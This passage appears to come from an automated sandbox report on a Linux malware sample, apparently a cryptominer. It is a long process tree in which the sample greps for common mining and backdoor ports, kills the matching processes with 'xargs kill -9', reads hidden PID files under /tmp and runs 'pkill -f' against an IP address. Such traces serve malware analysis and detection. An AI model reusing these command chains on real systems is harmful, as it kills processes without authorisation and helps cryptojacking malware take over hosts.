                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:935
                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                            grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:936
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                              xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                              • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:937
                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                              grep :3333
                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:939
                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:940
                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:941
                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                    grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:942
                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:943
                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep :3389
                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:945
                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:946
                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:947
                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:948
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:949
                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep :4444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:951
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:953
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:954
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:955
                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep :5555
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:957
                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:958
                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:959
                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:960
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:961
                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep :6666
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:963
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:964
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:965
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:966
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:967
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep :6665
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:969
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:970
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:971
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:972
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:973
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep :6667
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:975
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:976
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:977
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:978
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:979
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep :7777
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:981
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:982
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:983
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:984
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:985
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep :8444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:987
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:988
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:989
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:990
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:991
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:994
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:995
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              grep :3347
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:993
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:996
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:997
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep :14444
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:999
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1001
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1002
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1003
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            grep :14433
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1005
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1006
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1007
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1008
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1009
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    grep :13531
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1011
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      awk "{print \$7}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1012
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/awk
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        awk "-F[/]" "{print \$1}"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1013
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/grep
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          grep -v -
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1014
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1015
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1017
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cat /tmp/.X11-unix/01
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1016
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1019
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cat /tmp/.X11-unix/11
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1018
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cat /tmp/.X11-unix/22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1020
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1021
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      cat /tmp/.systemd.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1022
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1023
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cat /tmp/.systemd.2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1024
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1025
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1027
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            cat /tmp/.systemd.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1026
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              cat /tmp/.systemd.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:1028
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                cat /tmp/.systemd.2
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1029
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  cat /tmp/.systemd.3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1030
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:1032
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    cat /tmp/.pg_stat.0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:1031
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:1034
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        cat /tmp/.pg_stat.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1033
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /usr/bin/xargs
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          xargs -I "%" kill -9 "%"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • Attempts to change immutable files
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:1036
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • /bin/cat
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          cat /data/./oka.pid
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:1035
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • /usr/bin/pkill
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            pkill -f 80.211.206.105
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • Reads CPU attributes
